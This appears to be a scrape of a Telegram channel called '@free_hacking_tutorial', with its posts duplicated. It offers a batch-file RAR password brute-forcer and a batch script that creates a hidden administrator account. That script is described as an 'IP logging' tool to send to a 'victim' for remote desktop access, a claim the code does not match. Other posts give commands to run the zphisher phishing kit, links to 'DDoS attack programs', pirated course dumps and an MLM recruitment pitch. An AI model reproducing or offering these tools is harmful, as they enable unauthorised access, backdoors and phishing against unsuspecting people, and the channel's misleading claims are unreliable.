.RAR FILE PASSWORD CRACKING TUTORIAL
1.Create a new text file with note pad.
2. Paste this code into the file
( press to copy)
3. Save it as a .bat batch file.
4. Now run the program
5. Enter the zip file path that you want to crack the password for.
6. The program will take its time and crack the password.
Enjoy 🎈
__________________________
@free_hacking_tutorial
1.Create a new text file with note pad.
2. Paste this code into the file
( press to copy)
REM ============================================================
REM
@free_hacking_tutorial
@echo off
title Rar Password Cracker
mode con: cols=47 lines=20
copy “C:\Program Files\WinRAR\Unrar.exe”
SET PSWD=0
SET DEST=%TEMP%\%RANDOM%
MD %DEST%
:RAR
cls
echo ———————————————-
echo GET DETAIL
echo ———————————————-
echo.
SET/P “NAME=Enter File Name : ”
IF “%NAME%”==”” goto NERROR
goto GPATH
:NERROR
echo ———————————————-
echo ERROR
echo ———————————————-
echo Sorry you can’t leave it blank.
pause
goto RAR
:GPATH
SET/P “PATH=Enter Full Path : ”
IF “%PATH%”==”” goto PERROR
goto NEXT
:PERROR
echo ———————————————-
echo ERROR
echo ———————————————-
echo Sorry you can’t leave it blank.
pause
goto RAR
:NEXT
IF EXIST “%PATH%\%NAME%” GOTO START
goto PATH
:PATH
cls
echo ———————————————-
echo ERROR
echo ———————————————-
echo Opppss File does not Exist..
pause
goto RAR
:START
SET /A PSWD=%PSWD%+1
echo 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 0 0 1 0 1
echo 1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 1 1 1 0 0 0
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 0 0 1 1 1
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 0 0 0 0 0
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 1 0 1 0 0
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 1 1 1 1 0
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 0 0 0 1 1 0
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 1 1 1 1 0
echo 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 0 0 1 1 0
echo 1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 0 1 0 1 0 0
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 1 0 1 0 1
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 1 0 1 0 0
echo 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 0 0 1 1 0
echo 1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 1 0 1 0 0 1
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 1 1 1 0 0
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 1 1 0 1 1
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 0 0 1 1 0
echo 1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 0 1 0 1 0 0
echo 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 1 1 0 1 1
echo 1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 0 0 1 1 0 1
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 1 1 0 1 1
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 1 0 1 1 0
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 1 1 0 0 0
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 0 0 1 1 0 1
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 0 1 0 1 1
UNRAR E -INUL -P%PSWD% “%PATH%\%NAME%” “%DEST%”
IF /I %ERRORLEVEL% EQU 0 GOTO FINISH
GOTO START
:FINISH
RD %DEST% /Q /S
Del “Unrar.exe”
cls
echo ———————————————-
echo CRACKED
echo ———————————————-
echo.
echo PASSWORD FOUND!
echo FILE = %NAME%
echo CRACKED PASSWORD = %PSWD%
pause>NUL
exit
REM ============================================================
3. Save it as a .bat batch file.
4. Now run the program
5. Enter the zip file path that you want to crack the password for.
6. The program will take its time and crack the password.
Enjoy 🎈
__________________________
@free_hacking_tutorial
GET ACCESS TO ANYONE'S COMPUTER SYSTEM THROUGH IP LOGGING!
1. Open notepad and paste this code
3. Save this as a batch file.
4. Send this .exe to the victim.
5. The person's information is logged successfully!
6. Now you can access their system through RDP.
Enjoy 🎈
__________________________
@free_hacking_tutorial
1. Open notepad and paste this code
set /p pass= PLS INSERT YOUR PASSWORD :
net user /add %user% %pass%
net localgroup administrators /add %user%
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v %user% /t REG_DWORD /d 0
pause
3. Save this as a batch file.
4. Send this .exe to the victim.
5. The person's information is logged successfully!
6. Now you can access their system through RDP.
Enjoy 🎈
__________________________
@free_hacking_tutorial
I have been hacking since
public poll
>1 year – 262
👍👍👍👍👍👍👍 65%
< 1 year – 141
👍👍👍👍 35%
👥 403 people voted so far.
public poll
>1 year – 262
👍👍👍👍👍👍👍 65%
< 1 year – 141
👍👍👍👍 35%
👥 403 people voted so far.
Please open Telegram to view this post
VIEW IN TELEGRAM
Free Hacking Tutorial via @Qualitymovbot
Message
Any questions and information about the business you can inbox me @solo_learner
Free Hacking Tutorial via @Qualitymovbot
Message
Only 3 hours left for epic promotion sign up, buy the white package and get instantly upgraded to black the tutorial about the system is down below
Free Hacking Tutorial via @Qualitymovbot
Message
Those of you who have registered your fear of loss is counting down so buy the white package and be official paying member of crowd1 and invite 4 paying friends within 4 weeks and get 125€ instantly credited to your account
For questions please inbox me @solo_learner
For questions please inbox me @solo_learner
DDOS ATTACK PROGRAMS
Highly Powerful softwares!
https://mega.nz/folder/a6YmCYxA#Y69Ofo-PFI2ZWoMNxivv2A
_________________________
@free_hacking_tutorial
Highly Powerful softwares!
https://mega.nz/folder/a6YmCYxA#Y69Ofo-PFI2ZWoMNxivv2A
_________________________
@free_hacking_tutorial
mega.nz
File folder on MEGA
Forwarded from Deleted Account
ALL IN ONE HACKING TOOL! at 1000 members or 10k channel fast!!
Anonymous Poll
94%
Want this
6%
No, I am expert
Forwarded from Deleted Account
$ apt update && apt upgrade
$ apt install git
$ git clone git://github.com/htr-tech/zphisher.git
$ cd zphisher
$ bash zphisher.sh
ETHICAL HACKING & IT SECURITY COURSES
credits : Mr_Neophyte
Includes -
1. Cybersecurity for IT Professionals
2. Cybersecurity with Cloud Computing
3. Cybersecurity Foundations
4. Ethical Hacking Denial of Service
5. Ethical Hacking Enumeration
6. Ethical Hacking Session Hijacking
7. Ethical Hacking Wireless Networks
8. Ethical Hacking Mobile Devices and Platforms
9. Ethical Hacking Website and Web Application Testing
10. Ethical Hacking Exploits
11. Ethical Hacking Perimeter Defenses
12. Learning Kali Linux
13. Securing the IoT Designing and Testing
14. Securing Android Apps
15. Securing the IoT Secure 16.Architectures
17. Penetration Testing Essential Training
18. Ransomware Practical Reverse Engineering
Download ⬇️
https://mega.nz/folder/zMN00AKJ#V9ZTkIgJiE03YJDDwHe9Jw
____________________________
@free_hacking_tutorial
credits : Mr_Neophyte
4.84GB
🔥Includes -
1. Cybersecurity for IT Professionals
2. Cybersecurity with Cloud Computing
3. Cybersecurity Foundations
4. Ethical Hacking Denial of Service
5. Ethical Hacking Enumeration
6. Ethical Hacking Session Hijacking
7. Ethical Hacking Wireless Networks
8. Ethical Hacking Mobile Devices and Platforms
9. Ethical Hacking Website and Web Application Testing
10. Ethical Hacking Exploits
11. Ethical Hacking Perimeter Defenses
12. Learning Kali Linux
13. Securing the IoT Designing and Testing
14. Securing Android Apps
15. Securing the IoT Secure 16.Architectures
17. Penetration Testing Essential Training
18. Ransomware Practical Reverse Engineering
Download ⬇️
https://mega.nz/folder/zMN00AKJ#V9ZTkIgJiE03YJDDwHe9Jw
____________________________
@free_hacking_tutorial
mega.nz
File folder on MEGA
INTELLIGENCE SEARCH ENGINE
find leaked and vulnerable information of any websites, ip address and much more.
https://intelx.io
___________________________
@free_hacking_tutorial
find leaked and vulnerable information of any websites, ip address and much more.
https://intelx.io
___________________________
@free_hacking_tutorial
intelx.io
Intelligence X
Intelligence X is a search engine and data archive. Search Tor, I2P, data leaks and the public web by email, domain, IP, CIDR, Bitcoin address and more.
COMPLETE GUIDE TO JAVASCRIPT :
BEGGINER
Download 🔽
https://mega.nz/folder/wQYFBSKR#wcb0uUnSOqs8Z86jGFHCZg
____________________________
@free_hacking_tutorial
BEGGINER
- - >
ADVANCED!17.5GB
🔥Download 🔽
https://mega.nz/folder/wQYFBSKR#wcb0uUnSOqs8Z86jGFHCZg
____________________________
@free_hacking_tutorial
mega.nz
File folder on MEGA